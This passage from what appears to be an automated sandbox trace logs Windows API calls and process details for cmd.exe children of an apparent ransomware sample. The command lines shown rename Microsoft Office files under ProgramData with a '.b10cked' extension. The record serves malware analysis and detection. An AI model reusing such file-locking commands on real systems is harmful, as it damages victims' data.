lpFilePart=0x14ed00*="MOR6IN~1.TRX") returned 0x3c [0168.528] SetErrorMode (uMode=0x0) returned 0x1 [0168.529] SetErrorMode (uMode=0x0) returned 0x0 [0168.529] SetErrorMode (uMode=0x1) returned 0x0 [0168.529] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14f170, lpFilePart=0x14ed00 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked", lpFilePart=0x14ed00*="MOR6INT.REST.trx_dll.b10cked") returned 0x4c [0168.529] SetErrorMode (uMode=0x0) returned 0x1 [0168.529] SetLastError (dwErrCode=0x0) [0168.529] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6int.rest.trx_dll.b10cked")) returned 0xffffffff [0168.529] GetLastError () returned 0x2 [0168.529] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x14e67c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e67c) returned 0x2e2130 [0168.529] FindNextFileW (in: hFindFile=0x2e2130, lpFindFileData=0x14e67c | out: lpFindFileData=0x14e67c) returned 0 [0168.530] GetLastError () returned 0x12 [0168.530] FindClose (in: hFindFile=0x2e2130 | out: hFindFile=0x2e2130) returned 1 [0168.532] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6IN~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x2e1cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2e1cc0) returned 0x2e2130 [0168.532] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x14e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0168.532] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll", nBufferLength=0x104, lpBuffer=0x14e914, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll", lpFilePart=0x0) returned 0x44 [0168.532] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6int.rest.trx_dll")) returned 0x2020 [0168.533] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6int.rest.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MOR6INT.REST.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\mor6int.rest.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0168.533] FindClose (in: hFindFile=0x2e2130 | out: hFindFile=0x2e2130) returned 1 [0168.533] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x14e8c8 | out: _Buffer=" 1") returned 9 [0168.534] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.534] GetFileType (hFile=0x7) returned 0x2 [0168.784] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0168.784] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14e854 | out: lpMode=0x14e854) returned 1 [0168.784] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.784] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x14e888 | out: lpConsoleScreenBufferInfo=0x14e888) returned 1 [0168.785] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0168.787] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x14e8c8 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0168.787] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x14e8ac, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x14e8ac*=0x1a) returned 1 [0168.787] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.788] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.788] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.788] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.789] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.789] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.789] SetConsoleInputExeNameW () returned 0x1 [0168.789] GetConsoleOutputCP () returned 0x1b5 [0168.790] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.790] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.790] exit (_Code=0) Process: id = "288" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c20" os_pid = "0x7dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 22734 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 22735 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 22736 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 22737 start_va = 0x130000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 22738 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 22739 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 22740 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 22741 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 22742 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 22743 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 22821 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 22822 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 22823 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 22824 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 22825 start_va = 0x400000 end_va = 0x4fffff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 22826 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 22827 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 22828 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 22829 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 22830 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 22831 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 22832 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 22833 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 22834 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 22835 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 22836 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 22837 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 22928 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 22929 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 22930 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 22931 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 22932 start_va = 0x500000 end_va = 0x600fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 22933 start_va = 0x610000 end_va = 0x120ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 22934 start_va = 0x1210000 end_va = 0x1372fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001210000" filename = "" Thread: id = 352 os_tid = 0x930 [0168.705] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22fb24 | out: lpSystemTimeAsFileTime=0x22fb24*(dwLowDateTime=0x9bb4d060, dwHighDateTime=0x1d440a9)) [0168.705] GetCurrentProcessId () returned 0x7dc [0168.705] GetCurrentThreadId () returned 0x930 [0168.705] GetTickCount () returned 0x31dad [0168.705] QueryPerformanceCounter (in: lpPerformanceCount=0x22fb1c | out: lpPerformanceCount=0x22fb1c*=22549443400) returned 1 [0168.706] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0168.707] __set_app_type (_Type=0x1) [0168.707] __p__fmode () returned 0x76b331f4 [0168.707] __p__commode () returned 0x76b331fc [0168.707] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0168.707] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0168.707] GetCurrentThreadId () returned 0x930 [0168.707] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x930) returned 0x38 [0168.707] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0168.708] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0168.708] SetThreadUILanguage (LangId=0x0) returned 0x409 [0168.708] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0168.708] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22fab4 | out: phkResult=0x22fab4*=0x0) returned 0x2 [0168.708] VirtualQuery (in: lpAddress=0x22faeb, lpBuffer=0x22fa84, dwLength=0x1c | out: lpBuffer=0x22fa84*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.708] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22fa84, dwLength=0x1c | out: lpBuffer=0x22fa84*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0168.708] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22fa84, dwLength=0x1c | out: lpBuffer=0x22fa84*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0168.708] VirtualQuery (in: lpAddress=0x133000, lpBuffer=0x22fa84, dwLength=0x1c | out: lpBuffer=0x22fa84*(BaseAddress=0x133000, AllocationBase=0x130000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0168.708] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22fa84, dwLength=0x1c | out: lpBuffer=0x22fa84*(BaseAddress=0x230000, AllocationBase=0x230000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0168.708] GetConsoleOutputCP () returned 0x1b5 [0168.708] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.709] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0168.709] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.709] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0168.709] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.709] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0168.709] _get_osfhandle (_FileHandle=1) returned 0x7 [0168.709] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0168.709] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.709] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0168.710] _get_osfhandle (_FileHandle=0) returned 0x3 [0168.710] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0168.710] GetEnvironmentStringsW () returned 0x410210* [0168.710] FreeEnvironmentStringsW (penv=0x410210) returned 1 [0168.710] GetEnvironmentStringsW () returned 0x410210* [0168.710] FreeEnvironmentStringsW (penv=0x410210) returned 1 [0168.710] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea24 | out: phkResult=0x22ea24*=0x40) returned 0x0 [0168.710] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0xa0, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x1, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0x1, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x0, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x40, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x40, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0x40, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.711] RegCloseKey (hKey=0x40) returned 0x0 [0168.711] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22ea24 | out: phkResult=0x22ea24*=0x40) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0x40, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x1, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0x1, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x0, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x9, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x4, lpData=0x22ea30*=0x9, lpcbData=0x22ea28*=0x4) returned 0x0 [0168.711] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22ea2c, lpData=0x22ea30, lpcbData=0x22ea28*=0x1000 | out: lpType=0x22ea2c*=0x0, lpData=0x22ea30*=0x9, lpcbData=0x22ea28*=0x1000) returned 0x2 [0168.712] RegCloseKey (hKey=0x40) returned 0x0 [0168.712] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886386 [0168.712] srand (_Seed=0x5b886386) [0168.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked\"" [0168.712] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINT~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\MSOINTL.DLL.trx_dll.b10cked\"" [0168.712] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.712] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x411970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0168.713] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0168.713] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0168.713] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.713] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0168.713] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0168.713] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0168.713] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0168.713] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0168.713] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0168.713] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0168.713] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0168.713] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0168.713] GetEnvironmentStringsW () returned 0x412360* [0168.713] FreeEnvironmentStringsW (penv=0x412360) returned 1 [0168.713] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0168.714] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0168.714] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0168.714] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0168.714] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0168.714] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0168.714] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0168.714] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0168.714] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0168.714] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0168.714] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f7f0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.714] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x22f7f0, lpFilePart=0x22f7ec | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x22f7ec*="Desktop") returned 0x18 [0168.714] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.714] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f56c | out: lpFindFileData=0x22f56c) returned 0x4109f0 [0168.715] FindClose (in: hFindFile=0x4109f0 | out: hFindFile=0x4109f0) returned 1 [0168.715] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x22f56c | out: lpFindFileData=0x22f56c) returned 0x4109f0 [0168.715] FindClose (in: hFindFile=0x4109f0 | out: hFindFile=0x4109f0) returned 1 [0168.715] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x22f56c | out: lpFindFileData=0x22f56c) returned 0x4109f0 [0168.715] FindClose (in: hFindFile=0x4109f0 | out: hFindFile=0x4109f0) returned 1 [0168.715] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0168.715] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0168.716] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0168.716] GetEnvironmentStringsW () returned 0x410210* [0168.716] FreeEnvironmentStringsW (penv=0x410210) returned 1 [0168.716] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0168.716] GetConsoleOutputCP () returned 0x1b5 [0168.717] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0168.717] GetUserDefaultLCID () returned 0x409 [0168.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0168.717] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f930, cchData=128 | out: lpLCData="0") returned 2 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f930, cchData=128 | out: lpLCData="0") returned 2 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f930, cchData=128 | out: lpLCData="1") returned 2 [0168.718] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 